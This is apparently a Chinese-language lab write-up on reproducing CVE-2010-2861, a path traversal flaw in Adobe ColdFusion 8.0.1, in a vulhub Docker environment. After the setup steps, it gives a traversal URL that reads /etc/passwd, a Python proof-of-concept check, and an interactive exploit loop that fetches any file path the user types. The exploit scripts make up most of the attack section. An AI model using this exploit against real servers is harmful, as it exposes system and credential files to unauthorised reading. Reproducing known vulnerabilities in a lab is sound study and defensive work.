环境搭建:
使用vulhub,进入对应文件夹启动Adobe CanFusion 8.0.1版本服务器:
[root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/
[root@localhost CVE-2010-2861]# docker-compose up -d
查看端口:
[root@localhost ~]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
781868f36616 vulhub/coldfusion:8.0.1 "bash -c '/opt/coldf…" 24 hours ago Up 24 hours 0.0.0.0:8500->8500/tcp, :::8500->8500/tcp cve-2010-2861_coldfusion_1
环境启动可能需要1~5分钟,启动后,访问http://your-ip:8500/CFIDE/administrator/enter.cfm,可以查看初始化页面,输入密码admin,开始初始化整个环境。
漏洞复现:
直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,Burp Suite查看文件,读取文件/etc/passwd:
POC编写:
import requests
url = "http://192.168.33.170:8500/" #url地址
poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en" #读取/etc/passwd
res = requests.get(url+poc) #发送请求
if "/bin/bash" in res.text and res.status_code == 200: #利用 "/bin/bash" 特征和响应 200 判断
print("CVE-2010-2861 存在")
pycharm运行结果:
EXP编写:
import requests,re
url = "http://192.168.33.170:8500/" #url地址
poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en" #读取/etc/passwd
res = requests.get(url+poc) #发送请求
if "/bin/bash" in res.text and res.status_code == 200: #利用 "/bin/bash" 特征和响应 200 判断
print("CVE-2010-2861 存在")
while 1: # EXP死循环
dir = input("请输入你要读取的文件:")
exp_res = requests.get(res.url.replace("/etc/passwd",dir)) #将要读取的/etc/passwd目录文件替换成输入的目录文件
print(re.findall("<title>([\s\S]*?)</title>",exp_res.text)) #利用正则输出匹配的结果
pycharm运行结果: